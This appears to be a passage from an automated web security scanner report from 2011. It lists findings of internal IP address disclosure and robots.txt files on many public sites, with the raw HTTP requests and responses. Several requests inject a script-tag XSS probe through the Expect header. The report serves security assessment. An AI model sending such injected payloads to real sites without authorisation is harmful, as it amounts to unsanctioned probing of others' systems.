"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.57. http://www.veenx.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veenx.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.veenx.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 924936710
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:18:45 GMT
Via: 1.1 varnish 172.17.35.19
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.58. http://www.vforcecustoms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vforcecustoms.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vforcecustoms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2236837222
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:09:39 GMT
Via: 1.1 varnish 172.17.2.192
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.59. http://www.votigo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.votigo.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.votigo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=NJMZMZS192.168.1.246CKMLQ; path=/
Date: Wed, 04 May 2011 03:03:39 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

26.60. http://www.webware.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webware.com
Path:   /c

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /c HTTP/1.1
Host: www.webware.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:28:48 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: text/html
Cache-Control: private
Content-Length: 21942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<!-- Vader loves you -->
<head>


...[SNIP]...
siteId: '3',
assetId: ' ',
pageNumber: '',
channelId: '',
editionId: '3',
brandId: '5',
breadcrumb: ' ',
userIP: '10.16.180.54',
guid: ''
});

</script>
...[SNIP]...

26.61. http://www.webware.com/crossdomain.xm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webware.com
Path:   /crossdomain.xm

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /crossdomain.xm HTTP/1.1
Host: www.webware.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:28:46 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: text/html
Cache-Control: private
Content-Length: 22199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<!-- Vader loves you -->
<head>


...[SNIP]...
siteId: '3',
assetId: ' ',
pageNumber: '',
channelId: '',
editionId: '3',
brandId: '5',
breadcrumb: ' ',
userIP: '10.16.180.54',
guid: ''
});

</script>
...[SNIP]...

26.62. http://www.ziggityzoom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ziggityzoom.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ziggityzoom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 590690675
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:13:45 GMT
Via: 1.1 varnish 172.17.34.210
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

27. Robots.txt file  previous  next
There are 1856 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


27.1. http://4qinvite.4q.iperceptions.com/1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 4qinvite.4q.iperceptions.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:c24"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE1
Date: Wed, 04 May 2011 01:14:14 GMT
Connection: close

User-agent: *
Disallow: /

27.2. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.SD148013N3671SN0/B5403038.2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Wed, 04 May 2011 01:28:55 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

27.3. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Fri, 03 Jun 2011 00:54:06 GMT
X-FB-Server: 10.42.11.65
Connection: close
Content-Length: 24

User-agent: *
Disallow:

27.4. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:04 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: k=173.193.214.243.1304470444673291; path=/; expires=Wed, 11-May-11 00:54:04 GMT; domain=.twitter.com
Last-Modified: Fri, 22 Apr 2011 17:23:16 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Thu, 05 May 2011 00:54:04 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.5. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Thu, 05 May 2011 01:28:53 GMT
Date: Wed, 04 May 2011 01:28:53 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

27.6. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1268078506000"
Last-Modified: Mon, 08 Mar 2010 20:01:46 GMT
Content-Type: text/plain
Content-Length: 36
Date: Wed, 04 May 2011 01:12:34 GMT
Connection: close

# go away
User-agent: *
Disallow: /

27.7. http://dw.com.com/clear/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dw.com.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:54 GMT
Server: Apache/2.0
Last-Modified: Tue, 05 Oct 2010 02:03:43 GMT
Accept-Ranges: bytes
Content-Length: 854
Cache-Control: max-age=14400
Expires: Wed, 04 May 2011 05:28:54 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=363, max=789
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/third_party/apache2/configs/dw/dwcomcom/robots.txt,v $
# $Revision: 1.2 $
User-agent: *
Disallow: /Ads/
Disallow: /redir/
Disallow: /rubicsclk/
# Disallow: /i/ is removed per 1907
...[SNIP]...

27.8. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=1199
Expires: Wed, 04 May 2011 01:35:57 GMT
Date: Wed, 04 May 2011 01:15:58 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

27.9. http://fonts.googleapis.com/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Wed, 04 May 2011 00:53:28 GMT
Expires: Wed, 04 May 2011 00:53:28 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

27.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Wed, 04 May 2011 00:50:00 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

27.11. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 11:47:15 GMT
ETag: "de0256-1b-4a052abaf56c0"
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:12:07 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


27.12. http://mads.cnet.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mads.cnet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:58 GMT
Server: Apache/2.2
Last-Modified: Tue, 05 Apr 2011 21:07:25 GMT
Accept-Ranges: bytes
Content-Length: 3614
Keep-Alive: timeout=15, max=494
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/ops/config/global/w/robots.txt,v $
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /av/
Disallow: /css/
Disal
...[SNIP]...

27.13. http://news.cnet.com/webware  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.cnet.com
Path:   /webware

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.cnet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:50 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
Content-Length: 3968
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=997
Connection: Keep-Alive
Content-Type: text/plain

"# $Source: /cvs/main/ops/config/global/w/robots.txt,v $"
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /css/
Disallow:
...[SNIP]...

27.14. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=84165129
Expires: Thu, 02 Jan 2014 04:28:06 GMT
Date: Wed, 04 May 2011 01:15:57 GMT
Connection: close

User-agent: *
Disallow: /

27.15. http://pixel.invitemedia.com/admeld_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 04 May 2011 01:28:58 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

27.16. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 05 May 2011 00:54:07 GMT
Content-Type: text/plain
Content-Length: 26
Date: Wed, 04 May 2011 00:54:07 GMT
Server: QS

User-agent: *
Disallow: /

27.17. http://s7.addthis.com/static/r07/tweet03.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /static/r07/tweet03.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:03:18 GMT
ETag: "e01e35-1b-4a143749a6980"
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:12:07 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


27.18. http://static.crowdscience.com/start-c2e7cdddce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.crowdscience.com
Path:   /start-c2e7cdddce.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.crowdscience.com

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Wed, 04 May 2011 01:28:53 GMT
Content-Type: text/plain
Connection: close
ETag: "50d8a018e8ae96732c8a2ba663c61d4e"
X-CF1: fI.iad2:cf:cacheA.iad2-01
Content-Length: 23
Last-Modified: Fri, 05 Feb 2010 19:15:09 GMT
X-CF2: L
Accept-Ranges: bytes

User-agent: *
Disallow:

27.19. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/cnetnews/300x250/cnetnews_atf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Mon, 02 May 2011 13:55:43 GMT
ETag: "f77cc-1a-4a24b612675c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Wed, 04 May 2011 01:28:54 GMT
Connection: close

User-agent: *
Disallow: /

27.20. http://tcr.tynt.com/javascripts/Tracer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/plain
Date: Wed, 04 May 2011 01:28:54 GMT
ETag: "3516526417"
Expires: Wed, 04 May 2011 01:58:54 GMT
Last-Modified: Wed, 11 Nov 2009 19:14:11 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 271
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /T
...[SNIP]...

27.21. http://themes.googleusercontent.com/font  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /font

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Wed, 04 May 2011 00:53:34 GMT
Expires: Wed, 04 May 2011 00:53:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

27.22. http://tracking.mediabarons.net/aff_l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.mediabarons.net
Path:   /aff_l

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tracking.mediabarons.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:58 GMT
Server: Apache/2.2.14 (Unix) mod_apreq2-20051231/2.6.0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Wed, 21 Oct 2009 07:26:31 GMT
ETag: "1b08046-19-4766ce5cff7c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.23. http://www.01net.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.01net.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.01net.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:19 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.10
Last-Modified: Fri, 01 Apr 2011 13:44:00 GMT
ETag: "41800b-287-49fdb9a2ae800"
Accept-Ranges: bytes
Content-Length: 647
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /img/
Disallow: /images2/
Disallow: /labo/
Disallow: /recherche/
Disallow: /outils/recherche/
Disallow: /telecharger/Total.php
Disallow: /produits/mon-espace/
Disallow: /outils
...[SNIP]...

27.24. http://www.1-800-volunteer.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1-800-volunteer.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1-800-volunteer.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 20 Jun 2010 16:40:50 GMT
ETag: "5d88bf-57e-d9ccc880"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

# Disallow all crawlers access to certain pages.
# Version 1.1 (9/6/2006)

User-agent: asterias
Disallow: /

User-agent: yahoo-blogs/v3.9
Disallow: /

User-agent: sitecheck.internetseer.com
Disallow:
...[SNIP]...

27.25. http://www.100-0principle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.100-0principle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.100-0principle.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:40:09 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Mar 2011 16:30:42 GMT
ETag: "1888439-63f-49d6e5140b080"
Accept-Ranges: bytes
Content-Length: 1599
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.26. http://www.1000text-messaging.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1000text-messaging.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1000text-messaging.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 18 Sep 2009 22:53:12 GMT
ETag: "349005b-1a-ff208600"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.27. http://www.1000waystocheat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1000waystocheat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1000waystocheat.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:28 GMT
Server: Apache
Last-Modified: Thu, 11 Mar 2010 17:55:14 GMT
Accept-Ranges: bytes
Content-Length: 27
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.28. http://www.1065.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1065.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1065.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4235972526 4235825262
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 01:01:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:01:16 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.29. http://www.1280.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1280.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1280.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:50 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Mon, 01 Dec 2008 09:30:52 GMT
ETag: "2440d3c-5e-45cf8ddf04b00"
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /include/
Disallow: /design/
Disallow: /plugins/
Disallow: /site/



27.30. http://www.14ers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.14ers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.14ers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:46:50 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 30 Nov 2010 02:02:38 GMT
ETag: "145ca0b-da-953ecb80"
Accept-Ranges: bytes
Content-Length: 218
Connection: close
Content-Type: text/plain

# Robots.txt file for http://www.14ers.com
#

User-agent: *
Disallow: /bb/
Disallow: /calendar/
Disallow: /chat/
Disallow: /data.files/
Disallow: /downloads/
Disallow: /htmlsite/
Disallow: /phpprogs/

...[SNIP]...

27.31. http://www.1club.fm/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1club.fm
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1club.fm

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:57:42 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 19:48:03 GMT
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.32. http://www.1funny.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1funny.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
